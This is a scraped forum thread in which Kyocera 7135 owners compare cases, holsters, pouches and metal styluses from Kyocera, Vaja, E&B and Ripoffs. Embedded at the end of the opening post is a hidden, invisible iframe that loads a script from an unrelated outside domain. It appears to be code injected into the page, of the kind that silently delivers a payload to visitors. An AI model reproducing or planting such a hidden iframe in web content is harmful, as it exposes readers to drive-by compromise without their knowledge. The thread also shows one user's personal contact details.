+ Reply to Thread
Page 1 of 4 1 2 3 4 LastLast

Cases for Kyo 7135

What case are people using? I ordered the Kyocera glove case and it isn't waht I thought. Looking for suggestions<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I carry it naked

I only use a case on my Siemens SX56.

Andy

FYI I just got today the leather pouch. VERY NICE velour interior, plus a pocket for an SD card. PLUS cutouts on the top for the LCD and the bottom so you can plug in a data cable and/or AC adapter without removing it. The leather DOES need to stretch out JUST a bit.

Vaja

Way back in my younger days when I carried my Palm V/Vx I had a case from Vaja that was awesome since you could leave it in the case to hotsync. This was as much a function of the Palm V/Vx hot sync cradle as it was the case. The material is excellent grade leather, they embossed the grafitti characters on the inside of the case and it was well padded (Palm withstood many a drop).

I bought a Vaja case for My Sony CLIE PEGN-760 and it is also excellent, with memory stick slots. Unfortunately it did not allow for hotsync in the case.

I am hoping that Vaja will offer one for the 7135. You can see what they have at the link below!!!

http://www.vajacases.com/vaja/catalo...ia/index2.html
    Mark
    ==========================
    Palm Personal > Palm V > Palm Vx > Clie 760 > Kyocera 7135 > Treo 600 >Treo 650 > (Maybe i730??)

I have used EB cases and stylii www.ebcases.com on all of my palms and my 6035. I sent an email to their CEO. He told me that they are investigating a case and a metal stlyus for the 7135. I keep reminding myself that this phone has not been released by any of the major carriers yet. I will alert the board when I hear more.

Seth

I personally love the quick release holster.

Originally posted by pdageek
    I personally love the quick release holster.
    Agree with you on that one.

Sure would love a metal stylus. Seth...how was the one for the 6035???

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Re: Vaja

Originally posted by mdlissner
    Way back in my younger days when I carried my Palm V/Vx I had a case from Vaja that was awesome since you could leave it in the case to hotsync. This was as much a function of the Palm V/Vx hot sync cradle as it was the case. The material is excellent grade leather, they embossed the grafitti characters on the inside of the case and it was well padded (Palm withstood many a drop).

I bought a Vaja case for My Sony CLIE PEGN-760 and it is also excellent, with memory stick slots. Unfortunately it did not allow for hotsync in the case.

I am hoping that Vaja will offer one for the 7135. You can see what they have at the link below!!!

http://www.vajacases.com/vaja/catalo...ia/index2.html
    I also used Vaja cases and sent this email back on 24/12/2002:

To: info@vajacases.com

Subject: Kyocera 7135

Will you be making cases for the Kyocera 7135??

If so, when will they be available and do you have a preview that I can look at??

This is the response:

We may be releasing a case for that devide in the future, though we do not know when exactly. Once the case has been released, we will let you know by e-mail.

Thanks

Best regards

Another vote for the holster. I had a holster for my Nokia 8260 but it scarred the phone up badly. I was worried that the holster would do the same to the Kyocera but it seems to be much better designed. I sure like the quick and easy access too.

Originally posted by Sethster
    I have used EB cases and stylii www.ebcases.com on all of my palms and my 6035. I sent an email to their CEO. He told me that they are investigating a case and a metal stlyus for the 7135. I keep reminding myself that this phone has not been released by any of the major carriers yet. I will alert the board when I hear more.

Seth
    Seth, I too have been a huge fan of E&B Cases metal stylus (marctronixx and I ordered ours when they first launched them in about April, 2001).
    I miss having a good heavy, sturdy stylus already. It would be great if they did one for the 7135. Though I am getting used to the official one and it's not that bad.
    ~'kito
    pdaPhoneHome Moderator

Administrator
    Off Topic...

'kito, if the 7135 came with a wooden stick off a tree, you would find some way to get used it ! :grofl2

Sooooooo true!!!!:biglaughb
    ~'kito
    pdaPhoneHome Moderator

I would have to vote for the holster. I tried this, the pouch, and leather case and the holster is the most comfortable and convenient one of the three.

Holster for me -- and I'm a girl! I wouldn't mind a sleek pouch for when I don't want to hook it on my belt or purse though. I don't like the idea of putting it in an evening bag naked.

I'm using the Kyocera leather pouch. I need to have the phone protected in case I brush up against something. Very well made. The first one I had for my 6035 broke where the mount for the swivel clip hooks on. The newer one was much better and the 7135 one has the same design as the newer one.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by Beryl
    . . . . .-- and I'm a girl! . . . . . . . . . . . I don't like the idea of putting it in an evening bag naked.
    Do you mean, . . . . . oh, nevermind.

Originally posted by Beryl
    ...I don't like the idea of putting it in an evening bag naked.
    Is that what you kids are calling it these days????? :blush2

Illegitimis nil carborundum DanDiego's Avatar
    The Kyo leather case is not bad. If it would let you hotsync without taking the case on and off, I would probably use it, but that's kind of a pain, and the clip is not as convenient as the holster. Plus I bought a second holster and am using it as a car mount, holds the phone open securely.

I have the E&B case on my 6035 and the padding saved it from several drops.

Anyone want to buy the Kyo case, hardly used?

Jeff -

The EB 6035 Stylus is fantastic. It has a center ballpoint pen that is ever so handy. Just screw off the stylus tip and you have a hidden pen. Plus it has a real nice feel to it. Unfortunately, it protrudes out the top of the 7135 by about 1/3". I sure hope EB comes up with one that fits because the stock 7135 plastic stylus is very short. After a while of writing, I find it uncomfortable for me to use.

If you want help create demand for a 7135 metal stylus, send a request to newproducts@ebcases.com

Originally posted by djjefft
    Agree with you on that one.

Sure would love a metal stylus. Seth...how was the one for the 6035???

Jeff

Another 7135 pouch

Although I have no 7135 yet, I already have both of the Kyocera cases (case & pouch).

While I also have several cases for my 6035, the one I really like and use are called Ripoff's. www.ripoffs.com

They are a heavy padded black nylon pouch design. The unique clip design holds the phone closer to your body than the swivel clips used by others. As the clip is pretty long, it just lifts up on your belt when you sit down, rather than having to swivel it.

I have no financial interest in this company but would appreciate if some of you would contact them and tell them you want one of their cases for the 7135.

Thanks to all...